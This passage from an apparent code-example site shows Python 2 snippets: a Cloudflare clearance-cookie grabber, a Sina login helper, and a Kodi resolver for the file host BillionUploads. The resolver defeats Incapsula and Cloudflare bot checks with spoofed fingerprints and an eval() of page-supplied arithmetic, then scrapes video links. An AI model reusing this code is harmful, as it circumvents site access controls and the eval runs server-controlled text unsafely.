            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

            try:
                request = urllib2.Request(query)
                _add_request_header(request, headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
            except:
                pass

            cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

            if 'cf_clearance' in cookie:
                self.cookie = cookie
        except:
            pass
예제 #29
0
import fileinput

body = {
    '__rnd': '',
    '_k': '',
    '_t': '0',
    'count': '50',
    'end_id': '',
    'max_id': '',
    'pagebar': '',
    'pre_page': '0',
    'uid': '1742439305'
}

uuid = None
cj = cookielib.LWPCookieJar()
cookie_support = urllib2.HTTPCookieProcessor(cj)
opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
urllib2.install_opener(opener)


# 获取 servertime noce pubkey rsakv
def get_info():
    url = 'http://login.sina.com.cn/sso/prelogin.php?entry=sso&callback=sinaSSOController.preloginCallBack&su=&rsakt=mod&client=ssologin.js(v1.4.4)'
    data = urllib2.urlopen(url).read()
    p = re.compile('\((.*)\)')
    try:
        json_data = p.search(data).group(1)
        data = json.loads(json_data)
        servertime = str(data['servertime'])
        nonce = data['nonce']
예제 #30
0
    def billionuploads(self, url):
        try:
            cookie_file = os.path.join(cookiepath, 'billionuploads.lwp')

            cj = cookielib.LWPCookieJar()
            if os.path.exists(cookie_file):
                try:
                    cj.load(cookie_file, True)
                except:
                    cj.save(cookie_file, True)
            else:
                cj.save(cookie_file, True)

            normal = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            headers = [
                ('User-Agent',
                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'
                 ),
                ('Accept',
                 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
                 ), ('Accept-Language', 'en-US,en;q=0.5'),
                ('Accept-Encoding', ''), ('DNT', '1'),
                ('Connection', 'keep-alive'), ('Pragma', 'no-cache'),
                ('Cache-Control', 'no-cache')
            ]
            normal.addheaders = headers

            class NoRedirection(urllib2.HTTPErrorProcessor):
                # Stop Urllib2 from bypassing the 503 page.
                def http_response(self, request, response):
                    code, msg, hdrs = response.code, response.msg, response.info(
                    )
                    return response

                https_response = http_response

            opener = urllib2.build_opener(NoRedirection,
                                          urllib2.HTTPCookieProcessor(cj))
            opener.addheaders = normal.addheaders
            response = opener.open(url).read()
            decoded = re.search('(?i)var z="";var b="([^"]+?)"', response)
            if decoded:
                decoded = decoded.group(1)
                z = []
                for i in range(len(decoded) / 2):
                    z.append(int(decoded[i * 2:i * 2 + 2], 16))
                decoded = ''.join(map(unichr, z))
                incapurl = re.search(
                    '(?i)"GET","(/_Incapsula_Resource[^"]+?)"', decoded)
                if incapurl:
                    incapurl = 'http://billionuploads.com' + incapurl.group(1)
                    opener.open(incapurl)
                    cj.save(cookie_file, True)
                    response = opener.open(url).read()

            captcha = re.search(
                '(?i)<iframe src="(/_Incapsula_Resource[^"]+?)"', response)
            if captcha:
                captcha = 'http://billionuploads.com' + captcha.group(1)
                opener.addheaders.append(('Referer', url))
                response = opener.open(captcha).read()
                formurl = 'http://billionuploads.com' + re.search(
                    '(?i)<form action="(/_Incapsula_Resource[^"]+?)"',
                    response).group(1)
                resource = re.search('(?i)src=" (/_Incapsula_Resource[^"]+?)"',
                                     response)
                if resource:
                    import random
                    resourceurl = 'http://billionuploads.com' + resource.group(
                        1) + str(random.random())
                    opener.open(resourceurl)
                recaptcha = re.search(
                    '(?i)<script type="text/javascript" src="(https://www.google.com/recaptcha/api[^"]+?)"',
                    response)
                if recaptcha:
                    response = opener.open(recaptcha.group(1)).read()
                    challenge = re.search('''(?i)challenge : '([^']+?)',''',
                                          response)
                    if challenge:
                        challenge = challenge.group(1)
                        captchaimg = 'https://www.google.com/recaptcha/api/image?c=' + challenge
                        img = xbmcgui.ControlImage(450, 15, 400, 130,
                                                   captchaimg)
                        wdlg = xbmcgui.WindowDialog()
                        wdlg.addControl(img)
                        wdlg.show()

                        xbmc.sleep(3000)

                        kb = xbmc.Keyboard(
                            '', 'Please enter the text in the image', False)
                        kb.doModal()
                        capcode = kb.getText()
                        if (kb.isConfirmed()):
                            userInput = kb.getText()
                            if userInput != '': capcode = kb.getText()
                            elif userInput == '':
                                logerror(
                                    'BillionUploads - Image-Text not entered')
                                xbmc.executebuiltin(
                                    "XBMC.Notification(Image-Text not entered.,BillionUploads,2000)"
                                )
                                return None
                        else:
                            return None
                        wdlg.close()
                        captchadata = {}
                        captchadata['recaptcha_challenge_field'] = challenge
                        captchadata['recaptcha_response_field'] = capcode
                        opener.addheaders = headers
                        opener.addheaders.append(('Referer', captcha))
                        resultcaptcha = opener.open(
                            formurl, urllib.urlencode(captchadata)).info()
                        opener.addheaders = headers
                        response = opener.open(url).read()

            ga = re.search('(?i)"text/javascript" src="(/ga[^"]+?)"', response)
            if ga:
                jsurl = 'http://billionuploads.com' + ga.group(1)
                p = "p=%7B%22appName%22%3A%22Netscape%22%2C%22platform%22%3A%22Win32%22%2C%22cookies%22%3A1%2C%22syslang%22%3A%22en-US%22"
                p += "%2C%22userlang%22%3A%22en-US%22%2C%22cpu%22%3A%22WindowsNT6.1%3BWOW64%22%2C%22productSub%22%3A%2220100101%22%7D"
                opener.open(jsurl, p)
                response = opener.open(url).read()

    #         pid = re.search('(?i)PID=([^"]+?)"', response)
    #         if pid:
    #             normal.addheaders += [('Cookie','D_UID='+pid.group(1)+';')]
    #             opener.addheaders = normal.addheaders
            if re.search('(?i)url=/distil_r_drop.html', response) and filename:
                url += '/' + filename
                response = normal.open(url).read()
            jschl = re.compile('name="jschl_vc" value="(.+?)"/>').findall(
                response)
            if jschl:
                jschl = jschl[0]
                maths = re.compile('value = (.+?);').findall(
                    response)[0].replace('(', '').replace(')', '')
                domain_url = re.compile('(https?://.+?/)').findall(url)[0]
                domain = re.compile('https?://(.+?)/').findall(domain_url)[0]
                final = normal.open(
                    domain_url +
                    'cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' %
                    (jschl, eval(maths) + len(domain))).read()
                html = normal.open(url).read()
            else:
                html = response

            data = {}
            r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">', html)
            for name, value in r:
                data[name] = value

            captchaimg = re.search(
                '<img src="((?:http://|www\.)?BillionUploads.com/captchas/.+?)"',
                html)
            if captchaimg:

                img = xbmcgui.ControlImage(550, 15, 240, 100,
                                           captchaimg.group(1))
                wdlg = xbmcgui.WindowDialog()
                wdlg.addControl(img)
                wdlg.show()

                kb = xbmc.Keyboard('', 'Please enter the text in the image',
                                   False)
                kb.doModal()
                capcode = kb.getText()
                if (kb.isConfirmed()):
                    userInput = kb.getText()
                    if userInput != '': capcode = kb.getText()
                    elif userInput == '':
                        showpopup(
                            'BillionUploads',
                            '[B]You must enter the text from the image to access video[/B]',
                            5000, elogo)
                        return None
                else:
                    return None
                wdlg.close()

                data.update({'code': capcode})

            data.update({'submit_btn': ''})
            enc_input = re.compile('decodeURIComponent\("(.+?)"\)').findall(
                html)
            if enc_input:
                dec_input = urllib2.unquote(enc_input[0])
                r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">',
                               dec_input)
                for name, value in r:
                    data[name] = value
            extradata = re.compile(
                "append\(\$\(document.createElement\('input'\)\).attr\('type','hidden'\).attr\('name','(.*?)'\).val\((.*?)\)"
            ).findall(html)
            if extradata:
                for attr, val in extradata:
                    if 'source="self"' in val:
                        val = re.compile(
                            '<textarea[^>]*?source="self"[^>]*?>([^<]*?)<'
                        ).findall(html)[0]
                    data[attr] = val.strip("'")
            r = re.findall("""'input\[name="([^"]+?)"\]'\)\.remove\(\)""",
                           html)

            for name in r:
                del data[name]

            normal.addheaders.append(('Referer', url))
            html = normal.open(url, urllib.urlencode(data)).read()
            cj.save(cookie_file, True)

            def custom_range(start, end, step):
                while start <= end:
                    yield start
                    start += step

            def checkwmv(e):
                s = ""
                i = []
                u = [[65, 91], [97, 123], [48, 58], [43, 44], [47, 48]]
                for z in range(0, len(u)):
                    for n in range(u[z][0], u[z][1]):
                        i.append(chr(n))
                t = {}
                for n in range(0, 64):
                    t[i[n]] = n
                for n in custom_range(0, len(e), 72):
                    a = 0
                    h = e[n:n + 72]
                    c = 0
                    for l in range(0, len(h)):
                        f = t.get(h[l], 'undefined')
                        if f == 'undefined': continue
                        a = (a << 6) + f
                        c = c + 6
                        while c >= 8:
                            c = c - 8
                            s = s + chr((a >> c) % 256)
                return s

            dll = re.compile(
                '<input type="hidden" id="dl" value="(.+?)">').findall(html)
            if dll:
                dl = dll[0].split('GvaZu')[1]
                dl = checkwmv(dl)
                dl = checkwmv(dl)
            else:
                alt = re.compile('<source src="([^"]+?)"').findall(html)
                if alt:
                    dl = alt[0]
                else:
                    raise Exception('Unable to resolve - No Video File Found')

            return dl

        except Exception, e:
            raise